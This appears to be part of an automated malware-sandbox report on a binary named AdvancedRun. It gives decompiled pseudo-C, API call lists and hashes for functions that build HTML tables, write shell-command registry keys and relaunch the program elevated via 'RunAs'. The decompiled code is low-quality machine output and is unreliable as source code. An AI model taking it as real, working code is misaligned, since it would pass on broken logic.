                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 1038210931-0
                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 56%
                                                                  			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                  0x00407763
                                                                  0x0040776c
                                                                  0x00407784
                                                                  0x0040778b
                                                                  0x00407797
                                                                  0x00407799
                                                                  0x0040779b
                                                                  0x004077a7
                                                                  0x004077ae
                                                                  0x004077bd
                                                                  0x004077c4
                                                                  0x004077d3
                                                                  0x004077da
                                                                  0x004077e1
                                                                  0x004077e6
                                                                  0x004077f2
                                                                  0x004077f5
                                                                  0x00407804
                                                                  0x00407805
                                                                  0x00407810
                                                                  0x00407812
                                                                  0x00407813
                                                                  0x00407818
                                                                  0x00407818
                                                                  0x00407825
                                                                  0x0040782d
                                                                  0x00407830
                                                                  0x0040783a
                                                                  0x00407840
                                                                  0x00407846
                                                                  0x00407849
                                                                  0x00407850
                                                                  0x0040785e
                                                                  0x00407864
                                                                  0x00407867
                                                                  0x0040786b
                                                                  0x0040786f
                                                                  0x00407877
                                                                  0x0040787a
                                                                  0x00407885
                                                                  0x00407892
                                                                  0x004078a8
                                                                  0x004078b8
                                                                  0x004078c5
                                                                  0x004078ff
                                                                  0x004078c7
                                                                  0x004078ca
                                                                  0x004078dd
                                                                  0x004078de
                                                                  0x004078e3
                                                                  0x004078e8
                                                                  0x004078eb
                                                                  0x004078f0
                                                                  0x004078f0
                                                                  0x00407906
                                                                  0x00407909
                                                                  0x0040790f
                                                                  0x0040791d
                                                                  0x00407923
                                                                  0x0040792d
                                                                  0x00407932
                                                                  0x0040793b
                                                                  0x00407942
                                                                  0x00407943
                                                                  0x0040794c
                                                                  0x00407953
                                                                  0x00407954
                                                                  0x00407959
                                                                  0x0040795c
                                                                  0x00407961
                                                                  0x0040796c
                                                                  0x00407971
                                                                  0x0040797a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00407838
                                                                  0x00407838
                                                                  0x0040783a
                                                                  0x00407980
                                                                  0x0040798a
                                                                  0x004079a1

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                  • API String ID: 1607361635-601624466
                                                                  • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                  • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 40%
                                                                  			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                  0x00407b65
                                                                  0x00407b7c
                                                                  0x00407b83
                                                                  0x00407b91
                                                                  0x00407b98
                                                                  0x00407ba6
                                                                  0x00407bad
                                                                  0x00407bb2
                                                                  0x00407bb9
                                                                  0x00407bca
                                                                  0x00407bcb
                                                                  0x00407bd6
                                                                  0x00407bdb
                                                                  0x00407bdc
                                                                  0x00407be1
                                                                  0x00407be1
                                                                  0x00407be8
                                                                  0x00407bf9
                                                                  0x00407bfa
                                                                  0x00407c05
                                                                  0x00407c0a
                                                                  0x00407c0b
                                                                  0x00407c1c
                                                                  0x00407c21
                                                                  0x00407c21
                                                                  0x00407c2a
                                                                  0x00407c2b
                                                                  0x00407c36
                                                                  0x00407c3b
                                                                  0x00407c3c
                                                                  0x00407c41
                                                                  0x00407c51
                                                                  0x00407c56
                                                                  0x00407c5b
                                                                  0x00407c65
                                                                  0x00407c68
                                                                  0x00407c6b
                                                                  0x00407c74
                                                                  0x00407c7b
                                                                  0x00407c80
                                                                  0x00407c82
                                                                  0x00407c88
                                                                  0x00407ca6
                                                                  0x00407c8a
                                                                  0x00407c8a
                                                                  0x00407c8b
                                                                  0x00407c96
                                                                  0x00407c9b
                                                                  0x00407c9c
                                                                  0x00407ca1
                                                                  0x00407ca1
                                                                  0x00407cb3
                                                                  0x00407cb4
                                                                  0x00407cbd
                                                                  0x00407cc4
                                                                  0x00407cc5
                                                                  0x00407cd0
                                                                  0x00407cd5
                                                                  0x00407cd6
                                                                  0x00407cdb
                                                                  0x00407ceb
                                                                  0x00407cf0
                                                                  0x00407cf3
                                                                  0x00407cf3
                                                                  0x00407cf3
                                                                  0x00000000
                                                                  0x00407cfc
                                                                  0x00407d00

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                  • API String ID: 2000436516-3842416460
                                                                  • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                  • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 51%
                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                  0x00404415
                                                                  0x0040441d
                                                                  0x0040442c
                                                                  0x00404435
                                                                  0x004045b3
                                                                  0x004045b7
                                                                  0x004045b7
                                                                  0x0040444b
                                                                  0x00404452
                                                                  0x00404457
                                                                  0x00404460
                                                                  0x00404461
                                                                  0x00404462
                                                                  0x0040446d
                                                                  0x00404472
                                                                  0x00404473
                                                                  0x00404490
                                                                  0x004044a5
                                                                  0x004044b4
                                                                  0x004044b6
                                                                  0x004044b7
                                                                  0x004044bd
                                                                  0x004044cf
                                                                  0x004044db
                                                                  0x004044eb
                                                                  0x004044f1
                                                                  0x004044f6
                                                                  0x004044f9
                                                                  0x004044fe
                                                                  0x00404506
                                                                  0x00404507
                                                                  0x00404508
                                                                  0x00404510
                                                                  0x00404521
                                                                  0x00404532
                                                                  0x00404539
                                                                  0x00404547
                                                                  0x0040454e
                                                                  0x0040455b
                                                                  0x0040455c
                                                                  0x00404564
                                                                  0x0040456f
                                                                  0x00404570
                                                                  0x00404571
                                                                  0x0040457c
                                                                  0x0040457d
                                                                  0x00404588
                                                                  0x00404589
                                                                  0x0040458a
                                                                  0x004045a0
                                                                  0x004045a5
                                                                  0x00404521
                                                                  0x004044eb
                                                                  0x004045ab
                                                                  0x00000000

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00404452
                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                  • memset.MSVCRT ref: 004044CF
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                  • memset.MSVCRT ref: 00404539
                                                                  • memset.MSVCRT ref: 0040454E
                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                  • API String ID: 486436031-734527199
                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 87%
                                                                  			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                  0x00406466
                                                                  0x0040647d
                                                                  0x00406484
                                                                  0x00406499
                                                                  0x004064a0
                                                                  0x004064af
                                                                  0x004064b4
                                                                  0x004064bb
                                                                  0x004064cd
                                                                  0x004064d2
                                                                  0x004064d4
                                                                  0x004064e4
                                                                  0x004064ea
                                                                  0x004064ea
                                                                  0x004064f3
                                                                  0x00406503
                                                                  0x00406514
                                                                  0x00406525
                                                                  0x0040653b
                                                                  0x0040654e
                                                                  0x00406568
                                                                  0x00406572
                                                                  0x0040657a
                                                                  0x00406582
                                                                  0x0040658a
                                                                  0x00406596

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00406484
                                                                  • memset.MSVCRT ref: 004064A0
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                    • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                    • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                    • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                  • wcscpy.MSVCRT ref: 004064E4
                                                                  • wcscpy.MSVCRT ref: 004064F3
                                                                  • wcscpy.MSVCRT ref: 00406503
                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                  • wcscpy.MSVCRT ref: 0040657A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                  • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                  • API String ID: 3037099051-2314623505
                                                                  • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                  • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                  • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                  • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}












                                                                  0x00401c31
                                                                  0x00401c33
                                                                  0x00401c48
                                                                  0x00401c4f
                                                                  0x00401c61
                                                                  0x00401c68
                                                                  0x00401c74
                                                                  0x00401c79
                                                                  0x00401c7a
                                                                  0x00401c7b
                                                                  0x00401c84
                                                                  0x00401c89
                                                                  0x00401c8e
                                                                  0x00401c8f
                                                                  0x00401c9b
                                                                  0x00401ca6
                                                                  0x00401caf
                                                                  0x00401cb9
                                                                  0x00401cc0
                                                                  0x00401cc7
                                                                  0x00401cce
                                                                  0x00401cd5
                                                                  0x00401cdd
                                                                  0x00401ce0
